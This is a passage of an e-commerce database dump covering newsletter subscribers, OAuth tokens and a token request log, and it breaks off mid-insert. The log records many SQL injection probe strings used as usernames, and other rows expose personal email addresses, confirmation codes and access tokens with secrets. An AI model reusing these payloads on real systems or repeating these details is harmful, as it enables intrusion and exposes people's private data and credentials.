CREATE TABLE `newsletter_queue_store_link` (
  `queue_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Queue ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Newsletter Queue Store Link';

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_subscriber`
--

CREATE TABLE `newsletter_subscriber` (
  `subscriber_id` int(10) UNSIGNED NOT NULL COMMENT 'Subscriber ID',
  `store_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Store ID',
  `change_status_at` timestamp NULL DEFAULT NULL COMMENT 'Change Status At',
  `customer_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `subscriber_email` varchar(150) DEFAULT NULL COMMENT 'Subscriber Email',
  `subscriber_status` int(11) NOT NULL DEFAULT 0 COMMENT 'Subscriber Status',
  `subscriber_confirm_code` varchar(32) DEFAULT 'NULL' COMMENT 'Subscriber Confirm Code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Newsletter Subscriber';

--
-- Dumping data for table `newsletter_subscriber`
--

INSERT INTO `newsletter_subscriber` (`subscriber_id`, `store_id`, `change_status_at`, `customer_id`, `subscriber_email`, `subscriber_status`, `subscriber_confirm_code`) VALUES
(1, 1, '2021-05-07 10:33:30', 4, 'sudipjeet.cse@gmail.com', 1, '0kq3h8d2yy2q8nnvhzzdoj9h7wuypaz0'),
(2, 1, '2021-04-26 22:17:59', 8, 'totewinthropbirrueta@gmail.com', 1, 's2en7dlyj2vyxqxwwezipsr6mhwwz95a'),
(3, 1, '2021-04-29 01:27:48', 9, 'knowable1975finnfinn@gmail.com', 1, 'wb23orc531lkkl0i29bnul9gg0c70rrs'),
(4, 1, '2021-05-12 07:43:47', 11, 'simonmccarthy9355@gmail.com', 1, '8ewkk8y6ko2e8i4f4wsh1bfv6rq8db56'),
(5, 1, '2021-05-12 08:01:14', 0, 'Joey99@gmail.com', 1, 'tqfgagc6oaizt161dy0ysq3fe2106zd3'),
(6, 1, '2021-05-27 14:47:13', 12, 'subcomponentraleigh@gmail.com', 1, 'zwjyy0l4galssfrehbmxdvdi2cw2onzo'),
(7, 1, '2021-06-05 17:43:15', 13, 'paulwoods8093@gmail.com', 1, 'fgz8oojk70yz7vmuhl1uz2pexzdqdt6l'),
(8, 1, '2021-06-07 04:16:19', 0, 'khanmrh@gmail.com', 1, '6xswbe0p6mztvj4snzct0n4s7u7vn6tr'),
(9, 1, '2021-06-12 02:59:34', 15, 'jb5474452@gmail.com', 1, '85cp5dtueuth5pe0a3fbbe74pspjjtkk'),
(10, 1, '2021-06-27 11:43:00', 16, 'fittsdot@gmail.com', 1, 'hpoe280n1puyin80zynky61a7lakdmfa'),
(11, 1, '2021-10-18 05:27:57', 17, 'lottiuxxuv72@gmail.com', 1, '56za7jfz64tqygqv6sd0t75o3ug2xkoq'),
(12, 1, '2021-10-27 14:02:05', 18, 'athenabsafd81@gmail.com', 1, 'ntw449qiietxznkwdeblz0y965iaems5'),
(13, 1, '2021-11-06 09:04:48', 19, 'summersroger9@gmail.com', 1, 'wkcvzdwsykxyhv7htbtybdqjzjwpeon8'),
(14, 1, '2021-11-20 19:00:24', 20, 'GaryMiller4A@gmail.com', 1, 'ow8nyv06dtmv1b7g5pi4zf03el99z4fx'),
(15, 1, '2021-11-22 09:55:16', 21, 'blairdaniella5@gmail.com', 1, '4rfk6dkoz4qm8xwf68n15scxqxuhncd6'),
(16, 1, '2021-12-03 09:49:19', 22, 'BeatriceSutton385583@gmail.com', 1, 'o1ahg79blmqoce7ndsa06ab1zk908j8n'),
(17, 1, '2021-12-21 02:49:20', 23, 'LloydJTrask@gmail.com', 1, 'v0btmi5dxrjq8etgwrvu6ixgr2c8qdn5'),
(18, 1, '2021-12-22 07:28:05', 24, 'RamiroGolubev247@gmail.com', 1, 'jm67hjlsr9cabyxxcxrfobehgophfgql'),
(19, 1, '2021-12-31 16:38:36', 25, 'cava2563@gmail.com', 1, '8lv2dcfj8el0bzb6vgb1tzmnfmnhqu3h'),
(20, 1, '2022-01-12 14:38:26', 27, 'haelliott7@gmail.com', 1, '7tv1g3dm21hzb0vzhkxv9duelmmzeplq'),
(21, 1, '2022-01-14 01:49:26', 28, 'slee84134@gmail.com', 1, 'k1yeurchmw5xaj9gg4i4t0sop1n5w0q0'),
(22, 1, '2022-01-22 07:27:25', 29, 'davenportmayo278905@gmail.com', 1, 'y680yytcld40302ocvtm1p81dhr1d3us'),
(23, 1, '2022-01-23 09:16:37', 30, 'foleylane554743@gmail.com', 1, 'arqcjd6vij9ansnlvly5gj9bjw7aayty'),
(24, 1, '2022-02-07 18:51:30', 31, 'premises.okonski7z@gmail.com', 1, 'k6fi6jzhwn872b2txl497bjexxt8j1km'),
(25, 1, '2022-02-23 21:09:11', 32, 'sherikahollimanfgv5@gmail.com', 1, 'vtzpnee2o10nhbv1onoyaoek8ebxn3po'),
(26, 1, '2022-02-24 23:12:59', 33, 'baileyknight902@gmail.com', 1, 'y1ahget8cwa1lalh9zo8jol028u9vy4j'),
(27, 1, '2022-03-06 21:48:05', 34, 'paswinskiegstephaniesy@gmail.com', 1, '6vo84ts18oqvpx4lxna526gk98j0xfah'),
(28, 1, '2022-03-21 09:39:03', 35, 'ac316995@gmail.com', 1, 'dytyl9dqajevmr6j3xkniwl13skj8hvd'),
(29, 1, '2022-03-27 13:21:47', 36, 'selinamdws@gmail.com', 1, 'svj1w5kmjf4gd3zghl6fdybepmrrldbh'),
(30, 1, '2022-03-28 13:01:36', 37, 'wjwjbsvgdnsvd@gmail.com', 1, '0pz5ma19zq7i0x3r3qahsso9rh1f932t'),
(31, 1, '2022-04-02 08:01:05', 38, 'abdolahahmadi5289@gmail.com', 1, 'u2v9g8ieuouvyyeykzqpbzex7shmxqgo'),
(32, 1, '2022-04-03 02:35:47', 39, 'gejyxjsxtacaraphillips@gmail.com', 1, '373b9xkpdr8b0zn8o9iv006270fzyf8c'),
(33, 1, '2022-04-10 13:11:04', 40, 'hghyggyu@gmail.com', 1, '0rw0ddva674ya807dbijrw0i3ttrbjcj'),
(34, 1, '2022-04-16 06:33:29', 41, 'sedasertf710@gmail.com', 1, 'xa60rz4ywbycsodmi0trpg4d62jtzlz2'),
(35, 1, '2022-04-23 00:03:55', 43, 'cinarmuge650@gmail.com', 1, '350cpom01hvneu0bnd8paw35pglftqbb'),
(36, 1, '2022-05-05 22:22:56', 44, 'Aannaedonnaey7797@gmail.com', 1, 'xxiu0ifi3knuywwiyjd35n32tge0hd6u'),
(37, 1, '2022-05-06 18:26:17', 45, 'Aljudmilaodonnaab2943@gmail.com', 1, 'g66ycuds9msgos2ahnmcenadwfpq3t28'),
(38, 1, '2022-05-13 10:04:03', 46, 'kiemcainhan66111@gmail.com', 1, 'rcib244pq6vc7kh93q6p34l4gpukbvyg'),
(39, 1, '2022-05-14 01:52:46', 47, 'henrrycleoo102@gmail.com', 1, 'wgd5rj4swh2z608g364d4fws4ar44o99'),
(40, 1, '2022-06-04 23:05:43', 48, '54alexanderrose@gmail.com', 1, 'ca9nzl2raetrct5a3gdkl901v6e47mxv'),
(41, 1, '2022-06-22 14:50:37', 49, 'ujerimiahu57oa45@outlook.com', 1, 'xeyek2x0fkxvl7z1nc0ucfcsm84iyjss'),
(42, 1, '2022-06-28 00:42:59', 50, 'zangelikak30a89zehc@outlook.com', 1, 'kggjczaqeks8nuwujdwqtssar51gnozr'),
(43, 1, '2022-07-20 04:55:12', 51, 'markiceu260ak82ekq9y@outlook.com', 1, 'z17a18acg2np5in677kjhrpbslnpvwc4'),
(44, 1, '2022-07-20 17:27:07', 52, 'vcolletteuo37w14z5iev0s@outlook.com', 1, 'u8tmg1hwpjjk2vx1qelbgdu9ywh90g0e'),
(45, 1, '2022-07-29 22:54:19', 53, 'gsheika728i8f6go4o@outlook.com', 1, 'wob77c2zk0ci5bet0pusdpb1g4brj5pc'),
(46, 1, '2022-07-30 13:14:45', 54, 'dkumiko461k0d5@outlook.com', 1, 'q0pev6lb1natgteuercr6m4f1r9hfafd'),
(47, 1, '2022-08-14 02:33:03', 55, 'dmoned651upqz@outlook.com', 1, 'qbw5nu8febsz9xb96t3far0dlt7a0p8t'),
(48, 1, '2022-08-28 04:30:36', 56, 'daveonb3l380b4j79@outlook.com', 1, 'ivzp1342ikgz054jolgtdibcvsrs4xqb'),
(49, 1, '2022-12-15 01:36:57', 61, 'klidrgyjqn@gmail.com', 1, '09y7x7g64ys1bo8l2yensxrkvhgkm3dc'),
(50, 1, '2025-03-08 11:06:15', 0, 'sample@email.tst', 1, 'xwtzqn7zomp2zj4tt5oab5h2lzgs1kuv'),
(51, 1, '2023-10-15 17:02:03', 0, 'Rhoda877_Rice2009@alabamahomenetwoks.com', 1, 'nkrx8l27vjnw2v0yd01xhs40bao81bij'),
(52, 1, '2023-11-10 10:35:21', 79, 'WfhzPO.cjppwj@rottack.autos', 1, 'zfiokwvggl6089lne5n40x10znhr0h3f'),
(53, 1, '2023-11-24 01:23:50', 80, 'llofaR.hqbmdjm@monochord.xyz', 1, '60443kokfly1m71m4em818ztd37ral3e'),
(54, 1, '2023-11-26 22:37:24', 81, 'UKlRFi.tdwcpwb@borasca.xyz', 1, 'b3jcewidpf1mqwvwrtk228ifv4uyle1k'),
(55, 1, '2023-12-01 00:22:46', 82, 'mXJwLI.ddwjjjc@paravane.biz', 1, 'f667xshglrkjz9444rpoesww0p0b6wzy'),
(56, 1, '2023-12-02 06:52:18', 83, 'JpdHmx.mhqwpp@virilia.life', 1, '4xy0fko0d6p3zqxcs0dxidjjrshemvop'),
(57, 1, '2023-12-07 10:59:16', 84, 'vnYduX.qcchhhd@tonetics.biz', 1, 'oi1isji08enezy1mhp3hovffz0lzbm4j'),
(58, 1, '2023-12-10 12:24:34', 86, 'enWHil.pwqwtmh@usufruct.bar', 1, 'n7bqwmxr068sptit9u3qbsukakue6he1'),
(59, 1, '2023-12-12 04:13:56', 87, 'LJvenn.twtjtbb@brasswire.me', 1, 'btenbonvv7bm49plg7c5eckmft0w4gav'),
(60, 1, '2023-12-13 18:55:50', 88, 'VSszAf.wbwhdcm@usufruct.bar', 1, 'q0bgtk9c9wlkm5bq4do72uth1mmks81l'),
(61, 1, '2023-12-31 13:54:46', 89, 'AsdUld.btbbbwp@purline.top', 1, 'mb7tj62cwxezyumqke2j3m44h3v1gaxn'),
(62, 1, '2024-01-01 21:04:16', 90, 'xEMMrX.bmpbhch@lustrum.cfd', 1, 'p0q3ffq5pac8vf9o2flvv7a4d9vo6erd'),
(63, 1, '2024-01-27 10:55:00', 91, 'EsxqRJ.bqbqhd@chiffon.fun', 1, 'm93yamcykfi3b55161fdfqon2g3yti85'),
(64, 1, '2024-02-02 05:46:55', 92, 'bVSxDv.dcwmqb@sabletree.foundation', 1, 'o361y6vx8232ht48n90cjieclxqplvql'),
(65, 1, '2024-02-05 02:48:03', 93, 'ubAqze.mdtqpm@chiffon.fun', 1, '1znfhsm6b48vn2k5492gq15yhauphwoj'),
(66, 1, '2024-02-16 23:27:56', 94, 'HqTfja.ttdqjhq@flexduck.click', 1, 'gl3vjnvfakmza40viphjo1v537bnecgd'),
(67, 1, '2024-02-24 22:49:49', 95, 'BhKWfr.pwbctjc@rushlight.cfd', 1, 'hjzs1khbh3xinrqigne26wwkz8y1mf6w'),
(68, 1, '2024-03-06 08:37:28', 96, 'VPVPVF.pmqjmbd@kerfuffle.asia', 1, 'dpckk0u1wde6tej1vhbr6geggbf92ulx'),
(69, 1, '2024-03-12 15:33:48', 97, 'yawDKK.phtptc@sabletree.foundation', 1, 'mg2negij0tnd6gw4iv9kzr9q3iljinsa'),
(70, 1, '2024-03-28 08:27:18', 98, 'qdjwjbdbhd.hq@monochord.xyz', 1, 'u4q73mpi58egfti5rtkectozvxlnc6h4'),
(71, 1, '2024-06-17 01:57:49', 99, 'alikee53616@5dub.lolcorp.online', 1, 'wmli2hof84fgwx9ifvgwoiihoz1wp24q'),
(72, 1, '2024-09-17 12:18:08', 100, 'doris_nugentmeds@outlook.com', 1, '1jih3gqo0025i0agetdewzc9zm0wgwtq'),
(73, 1, '2024-09-22 17:27:38', 101, 'joyce30compon06@outlook.com', 1, 'uwzmjhyzc105ltmwlu888vlvgv60ug4n'),
(74, 1, '2024-09-28 19:21:17', 102, 'alileasm@gmail.com', 1, 'i3o1w9c8h9do2ngf1l9x9hzd4b0xt5zg'),
(75, 1, '2024-10-01 09:48:06', 103, 'cofcgirl101@yahoo.com', 1, 'kxgxgb6wsg37d62qnalc8pwps7zfeo4m'),
(76, 1, '2024-10-18 10:25:04', 104, 'steelesimfoniyax8834@gmail.com', 1, 'tapldjqbi2upr63nyu7cj5vgr6csbmlw'),
(77, 1, '2024-10-21 19:10:25', 105, 'kassiaanu31@gmail.com', 1, '9xf63w305r7h8mh5n29p0nqjadx9na87'),
(78, 1, '2024-10-26 02:34:16', 106, 'sanngravesz7143@gmail.com', 1, '23lbmks7c706le2lj78obxz8teqykyhk'),
(79, 1, '2024-11-04 11:58:34', 107, 'wvvvferijxmff@yahoo.com', 1, '0puhfshkt3ww3ce03aiolqcwm7q1cho6'),
(80, 1, '2025-02-28 19:58:25', 111, 'lnjybaho@do-not-respond.me', 1, 'vzknkxrf1r7kidsgzmbb26jatwqiw8ss'),
(81, 1, '2025-05-23 12:20:09', 112, 'bjzqwamq@formtest.guru', 1, 'yjs7jhuaqkbwwnzf2eka4munzr7skxn9'),
(82, 1, '2025-07-02 22:24:28', 113, 'mikesdrums@aol.com', 1, 'xgp1i107z1aicuo9d4btsiyyyew6gv7k'),
(83, 1, '2025-07-04 22:01:01', 114, 'arleendoug12@gmail.com', 1, 'mtzgjmkurr9mki98bujwqg92ysb8s0c0'),
(84, 1, '2025-11-14 21:26:36', 115, 'carbonaracapibara87@outlook.com', 1, '6eq9w5ag7sqb15smkghoj585y60e4080'),
(85, 1, '2026-01-02 07:42:16', 116, 'testing@example.com', 1, '4adqlntn9hnu5ye6rp5b3xh21tcz1g40'),
(86, 1, '2026-01-02 07:14:58', 117, 'testing@example.comAv3zbKMi', 1, '9qqkm7g18wtggbr7ql38chrrp9thp7f2'),
(87, 1, '2026-01-03 11:04:15', 118, 'xadeyaja181@gmail.com', 1, 'cope65ihwbqs7pnyx1uy796evbm3s5f5'),
(88, 1, '2026-01-07 23:06:35', 119, 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', 1, 'nyds76138821xuwkqlq7sh51q5qkclsf'),
(89, 1, '2026-01-08 10:42:36', 120, 'fi.yi.v.e.cu.65@gmail.com', 1, 'bjbf76z7rnamygdw85my81b7xu1qrfcj'),
(90, 1, '2026-01-11 16:07:08', 121, 'iqe.c.i.ya.li.k.o80.6@gmail.com', 1, 'kn5u8oh07edap6w84oulzf30v4858ly2'),
(91, 1, '2026-03-02 01:55:45', 127, 'se.y.oj.ere.6.87@gmail.com', 1, 'ekednv08s5mitegxyb3dwcj3n8mp8art'),
(92, 1, '2026-03-10 06:54:24', 128, 'em.u.vo.s.esexu.k58@gmail.com', 1, 'o6x39veysvsatce06sldaueujd85q8c1'),
(93, 1, '2026-03-12 21:19:19', 129, 'h.o.fa.f.u.p.a.r.7.8@gmail.com', 1, 'lpmet7ii4fdaui0h4gxhrtacog12v8q9'),
(94, 1, '2026-03-28 09:04:05', 131, 'i.g.ut.e.liva8.2@gmail.com', 1, 'monvzrgw4gbba9po503khmdeecfu0ftp'),
(95, 1, '2026-04-10 17:29:16', 133, 'uloxu.h.esuj.i.b.45@gmail.com', 1, 'rqyhysj838o1va21i1f9gm8ic9g03mtq'),
(96, 1, '2026-04-18 17:22:41', 0, 'baldijinnnka5675@gmail.com', 1, 'j4eo7upcvjcangdbqz3cqea6fncaj2rs'),
(97, 1, '2026-04-28 00:13:23', 136, 'c.ahu.wu.zog.a.w0.4@gmail.com', 1, 'bp1ijnhjg6nyzastndsd5a9qyeyiaz7s'),
(98, 1, '2026-04-30 22:07:37', 138, 'g.o.q.uqu.y.447@gmail.com', 1, '4swcxcl0enlsn0vuli1oedjx7lz7pk1t');

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_template`
--

CREATE TABLE `newsletter_template` (
  `template_id` int(10) UNSIGNED NOT NULL COMMENT 'Template ID',
  `template_code` varchar(150) DEFAULT NULL COMMENT 'Template Code',
  `template_text` text DEFAULT NULL COMMENT 'Template Text',
  `template_styles` text DEFAULT NULL COMMENT 'Template Styles',
  `template_type` int(10) UNSIGNED DEFAULT NULL COMMENT 'Template Type',
  `template_subject` varchar(200) DEFAULT NULL COMMENT 'Template Subject',
  `template_sender_name` varchar(200) DEFAULT NULL COMMENT 'Template Sender Name',
  `template_sender_email` varchar(200) DEFAULT NULL COMMENT 'Template Sender Email',
  `template_actual` smallint(5) UNSIGNED DEFAULT 1 COMMENT 'Template Actual',
  `added_at` timestamp NULL DEFAULT NULL COMMENT 'Added At',
  `modified_at` timestamp NULL DEFAULT NULL COMMENT 'Modified At',
  `is_legacy` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Should the template render in legacy mode'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Newsletter Template';

-- --------------------------------------------------------

--
-- Table structure for table `oauth_consumer`
--

CREATE TABLE `oauth_consumer` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE current_timestamp() COMMENT 'Updated At',
  `name` varchar(255) NOT NULL COMMENT 'Name of consumer',
  `key` varchar(32) NOT NULL COMMENT 'Key code',
  `secret` varchar(32) NOT NULL COMMENT 'Secret code',
  `callback_url` text DEFAULT NULL COMMENT 'Callback URL',
  `rejected_callback_url` text NOT NULL COMMENT 'Rejected callback URL'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='OAuth Consumers';

-- --------------------------------------------------------

--
-- Table structure for table `oauth_nonce`
--

CREATE TABLE `oauth_nonce` (
  `nonce` varchar(32) NOT NULL COMMENT 'Nonce String',
  `timestamp` int(10) UNSIGNED NOT NULL COMMENT 'Nonce Timestamp',
  `consumer_id` int(10) UNSIGNED NOT NULL COMMENT 'Consumer ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='OAuth Nonce';

-- --------------------------------------------------------

--
-- Table structure for table `oauth_token`
--

CREATE TABLE `oauth_token` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `consumer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Oauth Consumer ID',
  `admin_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Admin user ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer user ID',
  `type` varchar(16) NOT NULL COMMENT 'Token Type',
  `token` varchar(32) NOT NULL COMMENT 'Token',
  `secret` varchar(32) NOT NULL COMMENT 'Token Secret',
  `verifier` varchar(32) DEFAULT NULL COMMENT 'Token Verifier',
  `callback_url` text NOT NULL COMMENT 'Token Callback URL',
  `revoked` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Token revoked',
  `authorized` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Token authorized',
  `user_type` int(11) DEFAULT NULL COMMENT 'User type',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Token creation timestamp'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='OAuth Tokens';

--
-- Dumping data for table `oauth_token`
--

INSERT INTO `oauth_token` (`entity_id`, `consumer_id`, `admin_id`, `customer_id`, `type`, `token`, `secret`, `verifier`, `callback_url`, `revoked`, `authorized`, `user_type`, `created_at`) VALUES
(1, NULL, NULL, 60, 'access', 'ewe0dsv9ahq79j1m6xyh89nwftv5n159', 'czx5ikjcnh480i4bggw4v00c56z13kl8', NULL, '', 0, 0, 3, '2022-12-13 13:28:46'),
(2, NULL, NULL, 65, 'access', '815ydvhho3pfoxctia8erfbp5rkgjy8x', 'nhgrunymeijy9p9g12usb1bxk29h0kbw', NULL, '', 0, 0, 3, '2023-04-05 13:26:35'),
(3, NULL, NULL, 65, 'access', 'ymgf1vjpj3viktrvsnyegs1ltiv9fott', 'me4b48zzms91wutqlxeqpomtuw70isi2', NULL, '', 0, 0, 3, '2023-06-26 12:53:33'),
(4, NULL, NULL, 65, 'access', '4e8v42sipdo9z2ziqcxj6t95wmksdcri', 'vylvvpms9mmo57nmn5mft3eubcfwu0k8', NULL, '', 0, 0, 3, '2023-06-26 14:35:54'),
(5, NULL, NULL, 65, 'access', 'f8385ma37xje1o9h07r0oqso7kcmy9j4', '7mrc461lx3wvnq1dtz281ozebtrjix0r', NULL, '', 0, 0, 3, '2023-06-26 15:31:37'),
(6, NULL, NULL, 65, 'access', 'jz5r2usba6kuebogbyy21e81xrh6shox', 'wg6wmn6n5967166ipjdwvz8v05hqufix', NULL, '', 0, 0, 3, '2023-07-04 08:40:08'),
(7, NULL, NULL, 65, 'access', 'sc805iyfyostajvugmzajx5034hyuybm', 'lktzbe04ezgj29e6ud34c8n75yhr1j12', NULL, '', 0, 0, 3, '2023-07-04 12:59:50'),
(8, NULL, NULL, 75, 'access', '2i05kwk2zw292mib0blc0lhjtita6fkl', 'n616ih0t5fx5pp7qknt7qr3qz1b7c15v', NULL, '', 0, 0, 3, '2023-08-12 10:32:54'),
(9, NULL, NULL, 75, 'access', 'nus17f5g2lqs9pmxwhihwlmbs4m6c7rt', 'trqv12yfe0g6fzrmo9o8xwxligbgyty6', NULL, '', 0, 0, 3, '2023-08-12 10:34:24'),
(10, NULL, NULL, 75, 'access', 's4d2obz0tepbw9amweiwasdt9xdr4d2h', 'cconiqdx08jw5fd6qztbpiuhz542yktu', NULL, '', 0, 0, 3, '2023-08-12 10:34:27'),
(11, NULL, NULL, 75, 'access', 'eowwb240qvdyf0yc9gpp67bqcxtrpxo6', 'uokcborukr5bhyflx7ecuy3ieybx40e2', NULL, '', 0, 0, 3, '2023-08-12 10:36:10'),
(12, NULL, NULL, 75, 'access', 'b9pz3upiufuiq20ngz9aywesubpzkmhu', '2nh15x9p7bubuyvluf4bn4kq2jadjq8p', NULL, '', 0, 0, 3, '2023-08-12 10:36:16'),
(13, NULL, NULL, 75, 'access', '80c1rgucbudq2apzixh2o3bra1z7at3s', 'orb9a5vluardv20w980xb3uuln4exgxc', NULL, '', 0, 0, 3, '2023-08-12 10:38:07'),
(14, NULL, NULL, 75, 'access', 'w0ffgzx5r60j5w3xguroqmsr50cfv626', 'fwdjhb7zode210b72rjam3skzqok34sk', NULL, '', 0, 0, 3, '2023-08-12 10:38:13'),
(15, NULL, NULL, 109, 'access', 'z838ypem9mq7cu5d5htp5allyas9m2q8', 'yd4vikzyhnhkrovmoh4rdh5aqcjs7xes', NULL, '', 0, 0, 3, '2024-12-12 14:31:52'),
(16, NULL, NULL, 109, 'access', 'l9uo7op5kyg794fzwzjxsc4p1zir5c88', '95xil5u60s8pp4q6dgwctn5fyd5n2uiz', NULL, '', 0, 0, 3, '2024-12-12 15:33:00'),
(17, NULL, NULL, 109, 'access', 'v6jgkil95heit7sboeagvoxff51bqbta', 'ritgf7x5d3wd65skfv6d9bf02fregsuy', NULL, '', 0, 0, 3, '2024-12-12 16:06:50'),
(18, NULL, NULL, 109, 'access', '6e8kaw0kme6vamhe1zf4b3z2p16304da', 'btezbezdvmv3fucxsnimp4x4q21c49xo', NULL, '', 0, 0, 3, '2024-12-12 16:35:38'),
(19, NULL, NULL, 109, 'access', '8tz6tr3sckwb157bf1l7bibcej8iyu5u', 'b6qjy36q8r85rpwjt6kzheiyrv3azvdn', NULL, '', 0, 0, 3, '2024-12-13 08:21:17'),
(20, NULL, NULL, 109, 'access', 'txev38o5e898vi7q8obh1lywl8ul2yf6', 'yyrxy09sa1pj0naiy0ifdzd2g4hhbdpj', NULL, '', 0, 0, 3, '2024-12-13 09:06:33'),
(21, NULL, NULL, 109, 'access', 'dvqlac7xe9gqyfyov2xl9w496v1ad31y', 'psyg2ufh149xstegq7yr033oczwateey', NULL, '', 0, 0, 3, '2024-12-14 07:14:27'),
(22, NULL, NULL, 115, 'access', 'rv7mq38j8nbn50071krnoo6mqa1k8n67', 'jy3dl08wx3qydmcjl8rl9k8phol6izv6', NULL, '', 0, 0, 3, '2025-11-14 21:26:37'),
(23, NULL, NULL, 116, 'access', '6vzubwt38cv6d6yeijl24e424bgfz0mi', 'wwhw5wpxvuopnusqa0q2xmqo5viphnat', NULL, '', 0, 0, 3, '2026-01-02 07:01:29'),
(24, NULL, NULL, 116, 'access', '76nved3a9eyqvqrayixjfve214gvytiw', 'ehlujo7fqmdq92134fxbczj580iqaauh', NULL, '', 0, 0, 3, '2026-01-02 07:01:38'),
(25, NULL, NULL, 109, 'access', '9bo4rbh5fniklfehz5gl6mkxo4tt43ml', '0w6ng6tklukhc09vw7xz9u5ok0gh4i5w', NULL, '', 0, 0, 3, '2026-04-24 15:46:21');

-- --------------------------------------------------------

--
-- Table structure for table `oauth_token_request_log`
--

CREATE TABLE `oauth_token_request_log` (
  `log_id` int(10) UNSIGNED NOT NULL COMMENT 'Log ID',
  `user_name` varchar(255) NOT NULL COMMENT 'Customer email or admin login',
  `user_type` smallint(5) UNSIGNED NOT NULL COMMENT 'User type (admin or customer)',
  `failures_count` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Number of failed authentication attempts in a row',
  `lock_expires_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Lock expiration time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Log of token request authentication failures.';

--
-- Dumping data for table `oauth_token_request_log`
--

INSERT INTO `oauth_token_request_log` (`log_id`, `user_name`, `user_type`, `failures_count`, `lock_expires_at`) VALUES
(1, '-1 OR 2+379-379-1=0+0+0+1 -- ', 2, 1, '2023-08-12 11:06:18'),
(2, '-1 OR 3+379-379-1=0+0+0+1 -- ', 2, 1, '2023-08-12 11:06:23'),
(3, '-1 OR 2+728-728-1=0+0+0+1', 2, 1, '2023-08-12 11:06:25'),
(4, '-1 OR 3+728-728-1=0+0+0+1', 2, 1, '2023-08-12 11:06:30'),
(5, '-1\' OR 2+747-747-1=0+0+0+1 -- ', 2, 1, '2023-08-12 11:06:34'),
(6, '-1\' OR 3+747-747-1=0+0+0+1 -- ', 2, 1, '2023-08-12 11:06:36'),
(7, '-1\' OR 2+566-566-1=0+0+0+1 or \'1jzUebow\'=\'', 2, 1, '2023-08-12 11:06:38'),
(8, '-1\' OR 3+566-566-1=0+0+0+1 or \'1jzUebow\'=\'', 2, 1, '2023-08-12 11:06:42'),
(9, '-1\\\" OR 2+606-606-1=0+0+0+1 -- ', 2, 1, '2023-08-12 11:06:47'),
(10, '-1\\\" OR 3+606-606-1=0+0+0+1 -- ', 2, 1, '2023-08-12 11:06:51'),
(11, 'if(now()=sysdate(),sleep(15),0)', 2, 2, '2026-01-02 07:33:13'),
(12, '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 2, 1, '2023-08-12 11:07:00'),
(13, '0\\\"XOR(if(now()=sysdate(),sleep(15),0))XOR\\\"Z', 2, 1, '2023-08-12 11:07:04'),
(14, '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\\\"+(select(0)from(select(sleep(15)))v)+\\\"*/', 2, 1, '2023-08-12 11:07:08'),
(15, '1 waitfor delay \'0:0:15\' -- ', 2, 1, '2023-08-12 11:07:12'),
(16, 'jH4kvrfU\'; waitfor delay \'0:0:15\' -- ', 2, 1, '2023-08-12 11:07:16'),
(17, 'gzHL6vJE\' OR 346=(SELECT 346 FROM PG_SLEEP(15))--', 2, 1, '2023-08-12 11:07:22'),
(18, 'RMaimE8G\') OR 362=(SELECT 362 FROM PG_SLEEP(15))--', 2, 1, '2023-08-12 11:07:29'),
(19, '99l2AVOm\')) OR 138=(SELECT 138 FROM PG_SLEEP(15))--', 2, 1, '2023-08-12 11:07:40'),
(20, 'sample@email.tst\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 2, 1, '2023-08-12 11:07:46'),
(21, '1\'\\\"', 2, 1, '2023-08-12 11:07:53'),
(22, '1', 2, 1, '2023-08-12 11:07:54'),
(23, '@@FagSk', 2, 1, '2023-08-12 11:08:01'),
(24, 'sample@email.tst', 2, 6, '2023-08-12 11:08:27'),
(30, 'admin', 3, 1, '2023-12-20 12:04:17'),
(32, 'testing@example.com', 2, 6, '2026-01-02 07:31:41'),
(38, 'testing@example.comgVNE42yk', 2, 1, '2026-01-02 07:32:57'),
(39, '-1 OR 5*5=25 -- ', 2, 1, '2026-01-02 07:33:02'),
(40, '-1 OR 5*5=25', 2, 1, '2026-01-02 07:33:03'),
(41, '-1\' OR 5*5=25 -- ', 2, 1, '2026-01-02 07:33:04'),
(42, '-1\" OR 5*5=25 -- ', 2, 1, '2026-01-02 07:33:04'),
(43, '-1\' OR 5*5=25 or \'4TNFxaI4\'=\'', 2, 1, '2026-01-02 07:33:05'),
(44, '-1\" OR 5*5=25 or \"TxEs6CY9\"=\"', 2, 1, '2026-01-02 07:33:06'),
(46, 'testing@example.com0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 2, 1, '2026-01-02 07:33:20'),
(47, 'testing@example.com0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 2, 1, '2026-01-02 07:33:26'),
